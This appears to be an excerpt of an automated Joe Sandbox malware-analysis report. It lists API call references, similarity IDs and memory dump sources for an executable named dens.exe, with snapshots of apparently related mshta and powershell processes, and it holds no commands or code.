                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C109046
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: HeapFree.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62C0FCBA5), ref: 00007FF62C109064
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                              • API String ID: 3580290477-1397442068
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$Err_FromUnicode_
                                                                                                                                                                                                                                              • String ID: no such name
                                                                                                                                                                                                                                              • API String ID: 3678473424-4211486178
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _PyObject_GC_New.PYTHON312(?,?,00000000,00007FFDFAA52513), ref: 00007FFDFAA525A6
                                                                                                                                                                                                                                              • PyObject_GC_Track.PYTHON312(?,?,00000000,00007FFDFAA52513), ref: 00007FFDFAA525D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Object_$Track
                                                                                                                                                                                                                                              • String ID: 3.2.0
                                                                                                                                                                                                                                              • API String ID: 16854473-1786766648
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001E.00000003.1792270892.000001E090900000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001E090900000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_30_3_1e090900000_mshta.jbxd
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000052.00000002.1913209375.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_82_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000052.00000002.1912812313.00007FFD9A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A280000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_82_2_7ffd9a280000_powershell.jbxd